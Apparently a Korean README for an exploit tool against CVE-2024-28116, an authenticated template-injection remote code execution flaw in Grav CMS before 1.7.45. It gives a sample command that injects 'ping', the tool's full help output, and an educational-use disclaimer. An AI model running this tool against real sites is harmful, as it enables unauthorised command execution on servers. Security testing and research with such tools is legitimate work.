
Grav CMS 1.7.45 미만 버전에서 인증된 사용자의 원격 코드 실행을 허용하는 익스플로잇 - CVE-2024-28116
이 코드는 Graver 깃허브 저장소에서 가져와 이 영상을 기반으로 일부 개선한 것입니다.
Grav CMS (버전 1.7.45 미만)에 대한 SSTI + RCE 취약점을 이용한 익스플로잇으로, CVE-2024-28116로 명명되었습니다. 이 스크립트는 기본적으로 취약점이 포함된 페이지를 생성하고, 실행한 후, 마지막으로 페이지를 삭제합니다.
python3 Grav_CMS_RCE.py -t http://10.10.10.10 -u 'admin' -p 'S3cureP4ssw0rd' -x 'ping -c 1 10.10.10.9'
도움말 메시지:
$ python3 Grav_CMS_RCE.py -h
usage: Grav_CMS_RCE.py [-h] -t TARGET [-P PORT] -u USERNAME -p PASSWORD -x COMMAND [--no-delete-file] [--panel-route PANEL_ROUTE] [--no-banner] [--show-warnings]
Grav CMS RCE (Authenticated).
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
URL where Grav CMS is running. Example: http://10.10.10.10
-P PORT, --port PORT Port running Grav CMS. Default: 80
-u USERNAME, --username USERNAME
Username to authenticate in Grav CMS
-p PASSWORD, --password PASSWORD
Password for the user in Grav CMS.
-x COMMAND, --command COMMAND
Command to inject/run.
--no-delete-file Do NOT delete the generated files. Useful to check command execution output.
--panel-route PANEL_ROUTE
Admin Panel route in Grav CMS. Default: /admin
--show-warnings Show warnings (if there are).
어떤 이유로 생성된 파일을 삭제하고 싶지 않다면 --no-delete-file 플래그를 사용하고, 스크립트가 알려주는 페이지에 접속하여 명령어 실행 결과를 확인할 수 있습니다.
CVE-2024-28116 / 이 익스플로잇에 대한 추가 정보:
Grav CMS v1.7.44 - Admin 1.10.44에서 테스트 완료.이 저장소의 소유자는 이 소프트웨어의 사용에 대해 책임을 지지 않습니다. 이 소프트웨어는 교육 목적으로만 제작되었습니다.